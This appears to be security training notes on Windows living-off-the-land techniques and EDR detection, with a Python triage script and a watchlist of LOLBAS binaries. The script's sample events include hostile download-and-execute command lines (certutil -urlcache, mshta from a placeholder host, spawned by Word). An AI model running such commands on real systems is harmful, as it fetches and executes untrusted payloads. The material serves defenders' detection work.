If you have problems spotting your own attacks, then spotting attacks from others will be harder...

Learning Activities

Goals

Background

The first track (limiting SSH access) relates to Phases 1 to 4: if an SSH brute-force succeeds, an attacker goes from Phase 1 directly to Phase 4. For server-side misconfigurations, API or exposed-service vulnerabilities, attackers can quickly complete objectives without going through the client zones. This track lets you experience the longer path to completing offensive objectives.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/9191838a-ab77-456d-8d16-2636c16a3a20/Screenshot_2021-05-14_at_2.41.09_PM.png

Key Lessons

This track focuses on Type 2: the system tools, processes and so on within Windows (since we touched on Unix earlier). The concepts apply equally to Unix variants. See https://lolbas-project.github.io

We focus on Type 2 because if you generate compiled binaries, C2 agents or the like, you will find that such files are 'dead-on-written' (rather than dead-on-arrival). Why? Because DFPM.exe (one of the OpenEDR host agents) denies read access to such Type 1 payloads.
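The practical consequence for defenders is that the EDR already handles Type 1 (dropped, compiled payloads) on write, so the detection gap is Type 2: signed, built-in Windows tools being invoked in ways an administrator rarely would. The script below is an added example and not course or OpenEDR code; it triages constructed process-creation events (a simplified `key=value|key=value` line format, not real telemetry) against a small hypothetical watchlist of LOLBAS-style binaries and argument patterns, plus an unusual-parent check. The binary names, patterns and sample events are assumptions chosen for illustration.

```python
"""Minimal Type 2 (living-off-the-land) triage over Windows process-creation events.

Added example, not course code. Type 1 payloads (dropped binaries) are blocked on
write by the EDR, so the remaining gap is signed system tools (Type 2). Detection
therefore keys on *how* a built-in is invoked and *who spawned it*, not on the file.
"""
import re
from dataclasses import dataclass, field

# Hypothetical watchlist (a few LOLBAS-style entries, not the full project list):
# argument patterns that indicate download/decode/execute misuse rather than
# ordinary administration of the same tool.
WATCHLIST = {
    "certutil.exe": [r"-urlcache", r"-decode", r"-encode"],
    "mshta.exe": [r"https?://", r"javascript:", r"vbscript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"javascript:", r"\.dll,\s*\w+\s+https?://"],
    "bitsadmin.exe": [r"/transfer", r"/addfile"],
}

# Parents from which an interactive system tool is rarely launched legitimately.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}


@dataclass
class ProcessEvent:
    image: str          # basename of the executed image, lower-cased
    command_line: str
    parent_image: str   # basename of the parent image, lower-cased
    user: str


@dataclass
class Finding:
    image: str
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Parse one constructed 'Key=Value|Key=Value' event line into a ProcessEvent."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcessEvent(
        image=fields["Image"].rsplit("\\", 1)[-1].lower(),
        command_line=fields.get("CommandLine", ""),
        parent_image=fields.get("ParentImage", "").rsplit("\\", 1)[-1].lower(),
        user=fields.get("User", ""),
    )


def triage(event):
    """Return a Finding when the event looks like LOLBin misuse, otherwise None.

    A watched binary with a benign command line and a normal parent is NOT flagged:
    the tool itself is legitimate, only its context is interesting.
    """
    patterns = WATCHLIST.get(event.image)
    if patterns is None:
        return None
    reasons = []
    for pat in patterns:
        if re.search(pat, event.command_line, re.IGNORECASE):
            reasons.append(f"argument pattern /{pat}/")
    if event.parent_image in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {event.parent_image}")
    if not reasons:
        return None
    return Finding(image=event.image, reasons=reasons)


def scan(lines):
    """Run triage over a batch of event lines and keep only the findings."""
    return [f for f in (triage(parse_event(l)) for l in lines if l.strip()) if f]


# Constructed sample events (not real telemetry). Hosts use a reserved .invalid TLD.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -verify cert.cer|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\admin",
    r"Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -split -f http://example.invalid/x.txt x.txt|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\jdoe",
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://example.invalid/a.hta|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|User=CORP\jdoe",
    r"Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe notes.txt|ParentImage=C:\Windows\explorer.exe|User=CORP\jdoe",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s C:\Program Files\Vendor\thing.dll|ParentImage=C:\Windows\System32\msiexec.exe|User=NT AUTHORITY\SYSTEM",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.image, "->", "; ".join(finding.reasons))
```

Only two of the five sample events are flagged: the `certutil -verify` call and the vendor `regsvr32 /s` registration are the same signed binaries used normally, which is exactly why a name-only rule would drown in noise. In a real deployment the event source would be the EDR's or Sysmon's process-creation telemetry and the watchlist would be derived from the LOLBAS entries relevant to the estate.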

As you progress into various offensive techniques, I will discuss further the detection techniques within OpenEDR.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/b6879e89-13b3-4138-bba4-8bac3d5f4700/Screenshot_2021-05-14_at_2.32.16_PM.png

Why harp on Code-Execution...

...when there are so many other offensive tactics and techniques? Apart from eavesdropping (e.g. MiTM to steal credentials, tokens, cookies and the like), almost all host-based offensive tactics require code execution!

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/75401c64-d22e-4546-a751-2f7420a2572f/F1F71E8D-4891-4A6E-A032-1B0B50FFFA6F.jpeg

There are many techniques in each tactical area. Students should attempt at least one technique per tactical area highlighted above. The model has some similarity with MITRE ATT&CK, but I developed my mental models independently; they happen to be similar. We reference it but won't use it in our internal training, as there are concerns about copyright issues, e.g. you need to use the full phrase MITRE ATT&CK and not just ATT&CK, plus other meaningless legalities to remember.

Why does Foreground vs Background Process matter?